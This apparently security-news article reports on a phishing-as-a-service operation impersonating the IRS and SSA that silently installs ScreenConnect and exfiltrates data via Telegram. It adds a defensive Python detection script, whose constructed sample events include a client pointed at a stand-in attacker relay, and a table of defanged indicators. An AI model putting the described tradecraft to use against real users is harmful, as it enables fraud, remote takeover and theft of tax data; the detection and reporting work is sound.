Hackers Abuse Legitimate RMM Tools in The Quarry IRS/SSA Phishing Campaigns
A highly organized cybercrime operation, dubbed The Quarry, is behind a recent wave of phishing campaigns targeting American taxpayers. The campaigns abuse legitimate Remote Monitoring and Management (RMM) tools and impersonate the IRS and the Social Security Administration (SSA) to deceive victims. New research details the tactics: what appeared to be dozens of unrelated incidents impersonating the IRS, the SSA, and platforms like DocuSign turned out to be the work of one developer selling a Phishing-as-a-Service (PhaaS) toolkit to nearly 200 paying operators.
The operation has been active since at least April 2025 and continues to run at the time of reporting.
The toolkit gives buyers everything they need to launch a full campaign without building a single tool themselves. Operators receive phishing pages, cloaking infrastructure, remote access panels, bulk email tools, and post-exploitation scripts.
Tax season is the most exploited window, but the operation runs year-round, adapting its lures to whatever pretext is most convincing.
Analysts at SOCRadar were the first to identify and document this ecosystem, naming it The Quarry in a report shared with Cyber Security News (CSN).
The threat actor behind it operates under the alias RockyBelling, also known as Rock, Rockky, and Mike, and runs a Telegram channel called Rocky War Room, which had 194 subscribers at the time of analysis.
The channel functions as a product catalog, support desk, and announcement board for new tool releases.
What makes The Quarry especially dangerous is its use of legitimate remote monitoring and management software as the final payload.
Instead of deploying recognizable malware, operators deliver a silent installation of ConnectWise ScreenConnect, a widely trusted remote access tool.
Because ScreenConnect is signed, commercially distributed software that many IT teams run legitimately, antivirus and EDR products that would flag a custom remote access trojan typically let it through, giving attackers full interactive control of the victim's device.
The operation already shows signs of growing downstream risk, with stolen credentials potentially being sold to ransomware groups through Initial Access Broker activity.

Over 500 distinct victim IP addresses were identified across 14 countries, with more than 90 percent of victims located in the United States.
Hackers Abuse Legitimate RMM Tools
The attack begins with a bulk email designed to look like an IRS refund notice, an SSA tax filing confirmation, or a document shared through a trusted platform.
When a victim clicks the link, the site quietly filters out non-Windows visitors and automated security scanners. A second layer uses Adspect, a traffic cloaking service, to block researchers before the fake page ever loads.
The phishing page replicates the Social Security Administration portal with convincing detail, including the SSA seal and familiar layout sections.

Victims are told to download a “Security Connector” to view their statement, while the real payload, a ScreenConnect MSI installer, is fetched silently through a hidden iframe on the page.
In April 2026, the developer released a VBS dropper sent by email that installs ScreenConnect silently while opening a decoy PDF to distract the victim.
Post-Exploitation Tools and Victim Impact
Once ScreenConnect is installed, operators can deploy PowerShell scripts to extract valuable data. One script pulls six months of browser history, first forcibly closing the browser so that the lock on its history database is released, and sends the data to the operator through the Telegram API.
A second script scans the victim’s files for W-2 tax documents, targeting Social Security numbers, employer records, and salary information.
The developer’s Telegram channel also promotes VioletRAT, a tool with credential dumping and cookie theft capabilities.
AWS access keys have been found in campaign logs, harvested from public-facing JavaScript files belonging to targeted organizations.
These capabilities confirm the operation actively pursues high-value financial and corporate data beyond simple credential theft.
Organizations can defend against The Quarry by maintaining an approved list of remote access tools and flagging any unexpected ScreenConnect installation immediately.
Telegram API traffic from endpoints that do not normally use the platform should be investigated, as it may signal active exfiltration.
Since government impersonation is central to this campaign, employees should know that the IRS and SSA never send executable downloads by email. Restricting VBScript execution from user-writable directories would further disrupt the VBS delivery chain before it can complete.
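The three defensive measures above translate directly into endpoint hunting logic. The following is an added example, not code from the SOCRadar report or from this article, that runs the checks over constructed Sysmon-style events (process creation, EventID 1, and network connection, EventID 3) as a SIEM might hand them over. One practical caveat it encodes: because ScreenConnect is often used legitimately by IT, blocking the product outright is rarely an option, so the example allowlists the organisation's own relay host rather than the tool. The relay hostname `support.example-corp.com`, the `TELEGRAM_OK` process list and the sample events are all hypothetical, and the assumption that the ScreenConnect client carries its relay in a query-style `h=` parameter on its command line should be verified against your own deployment.

```python
"""
Hunting logic for The Quarry tradecraft over constructed Sysmon-style events.

Added example, not from the SOCRadar report or the article. Assumptions:
  - events are dicts with Sysmon-like fields (EventID, Computer, Image,
    CommandLine, DestinationHostname);
  - APPROVED_RELAYS holds your own ScreenConnect relay host(s) (hypothetical);
  - TELEGRAM_OK lists processes expected to reach api.telegram.org (hypothetical);
  - the ScreenConnect client passes its relay as an "h=" query-style
    parameter on the command line (verify against your deployment).
"""
import re
from urllib.parse import parse_qs, unquote

APPROVED_RELAYS = {"support.example-corp.com"}   # hypothetical: your own relay
TELEGRAM_OK = {"telegram.exe"}                   # hypothetical allowlist

_SC_PARAM_RE = re.compile(r"\?([^\"' ]*)")          # query-style tail after '?'
_SILENT_MSI_RE = re.compile(r"/(qn|qb|q|quiet)\b", re.I)
_USER_WRITABLE_VBS_RE = re.compile(r"(\\users\\|\\temp\\|\\appdata\\).*\.vbs", re.I)


def screenconnect_relay(cmdline):
    """Return the relay host (h= parameter) from a ScreenConnect client
    command line, or None if the line carries no such parameter."""
    if "screenconnect" not in cmdline.lower():
        return None
    m = _SC_PARAM_RE.search(cmdline)
    if not m:
        return None
    params = parse_qs(unquote(m.group(1)))
    host = params.get("h")
    return host[0].lower() if host else None


def evaluate(events):
    """Apply the three checks from the text and return (computer, rule, detail) tuples."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        computer = ev.get("Computer", "?")
        if eid == 1:
            cmd = ev.get("CommandLine", "")
            image = ev.get("Image", "").lower()
            # 1. Unexpected ScreenConnect: a client pointed at a relay we do not own.
            relay = screenconnect_relay(cmd)
            if relay is not None and relay not in APPROVED_RELAYS:
                alerts.append((computer, "unapproved ScreenConnect relay", relay))
            # 1b. Silent (/qn, /quiet) msiexec install of a ScreenConnect package.
            if image.endswith("msiexec.exe") and "screenconnect" in cmd.lower() \
                    and _SILENT_MSI_RE.search(cmd):
                alerts.append((computer, "silent ScreenConnect MSI install", cmd))
            # 3. VBScript launched from a user-writable directory (the VBS dropper path).
            if image.endswith(("wscript.exe", "cscript.exe")) and _USER_WRITABLE_VBS_RE.search(cmd):
                alerts.append((computer, "VBScript from user-writable path", cmd))
        elif eid == 3:
            # 2. Telegram API traffic from a process that has no business using it.
            dest = ev.get("DestinationHostname", "").lower()
            proc = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
            if dest.endswith("api.telegram.org") and proc not in TELEGRAM_OK:
                alerts.append((computer, "Telegram API from unexpected process", proc))
    return alerts


# Constructed sample telemetry (not real logs): one infected workstation
# (WS-0412), one legitimate ScreenConnect client (WS-0099), one Telegram user (WS-0077).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-0412", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /i C:\\Users\\jdoe\\Downloads\\ScreenConnect.ClientSetup.msi /qn"},
    {"EventID": 1, "Computer": "WS-0412",
     "Image": "C:\\Program Files (x86)\\ScreenConnect Client (3f2a)\\ScreenConnect.ClientService.exe",
     "CommandLine": "\"C:\\Program Files (x86)\\ScreenConnect Client (3f2a)\\ScreenConnect.ClientService.exe\" "
                    "\"?e=Access&y=Guest&h=relay.attacker.invalid&p=443&s=1&k=abc\""},
    {"EventID": 1, "Computer": "WS-0099",
     "Image": "C:\\Program Files (x86)\\ScreenConnect Client (9c1d)\\ScreenConnect.ClientService.exe",
     "CommandLine": "\"C:\\Program Files (x86)\\ScreenConnect Client (9c1d)\\ScreenConnect.ClientService.exe\" "
                    "\"?e=Access&y=Guest&h=support.example-corp.com&p=443&s=2&k=def\""},
    {"EventID": 1, "Computer": "WS-0412", "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\IRS_Refund_Notice.vbs"},
    {"EventID": 3, "Computer": "WS-0412",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "DestinationHostname": "api.telegram.org"},
    {"EventID": 3, "Computer": "WS-0077",
     "Image": "C:\\Users\\amy\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe",
     "DestinationHostname": "api.telegram.org"},
]

if __name__ == "__main__":
    for computer, rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"{computer}: {rule}: {detail}")
```

Run against the constructed events, the legitimate client on WS-0099 and the Telegram desktop user on WS-0077 produce nothing, while WS-0412 trips all four checks in the order the events arrive. In production the same rules would be fed from Sysmon or EDR process and network telemetry, and the relay allowlist is the piece to get right first: without it, every alert from your own help desk is noise.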
Indicators of Compromise (IoCs):
| Type | Indicator | Description |
|---|---|---|
| Domain | estatetaxarchives[.]com | Operator-registered phishing domain, fiscal-portal naming pattern |
| Domain | hub.ssa-guidance[.]com | Operator-registered phishing domain impersonating SSA |
| Domain | inherittaxpapers[.]site | Operator-registered phishing domain, fiscal-portal naming pattern |
| Domain | verify.federal-docviewer[.]com | Operator-registered phishing domain impersonating a federal document service |
| Domain | portal.federalverify-ssaclientportal[.]com | Operator-registered phishing domain impersonating SSA |
| Domain | trusttaxportal[.]com | Operator-registered phishing domain, fiscal-portal naming pattern |
| Domain | estatetaxrecords[.]com | Operator-registered phishing domain, fiscal-portal naming pattern |
| Domain | tax-filecenter-irs.matthewtarwater[.]com | Compromised domain hosting The Quarry phishing kit |
| Domain | apps.docu-sign[.]net | Operator-registered phishing domain impersonating DocuSign |
| Domain | secure.login-socialsecurity[.]com | Operator-registered phishing domain impersonating SSA login |
| Domain | hub.ssa-userstatus[.]com | Operator-registered phishing domain impersonating SSA |
| Domain | secure.ssa-documentsync[.]com | Operator-registered phishing domain impersonating SSA |
| MD5 Hash | 8974830446d35e234881696092aded87 | Malicious payload sample identified during research |
| MD5 Hash | ef970697c5094c443f0456774cfee9bc | Malicious payload sample identified during research |
| MD5 Hash | 935413b08ef60cd819b2e1b573fc9050 | Malicious payload sample identified during research |
| MD5 Hash | 2163afa18a3cdfa525b767e0e1baaba1 | Malicious payload sample identified during research |
| MD5 Hash | 1827aa636cd86d1a4064e112aa197303 | Malicious payload sample identified during research |
| MD5 Hash | 00b69eb7f44b5987f68667343aaafb6a | Malicious payload sample identified during research |
| MD5 Hash | 01ab231bcd9533f90e99651521b6e1bb | Malicious payload sample identified during research |
Note: Domains are intentionally defanged (the dot before the TLD is written as [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.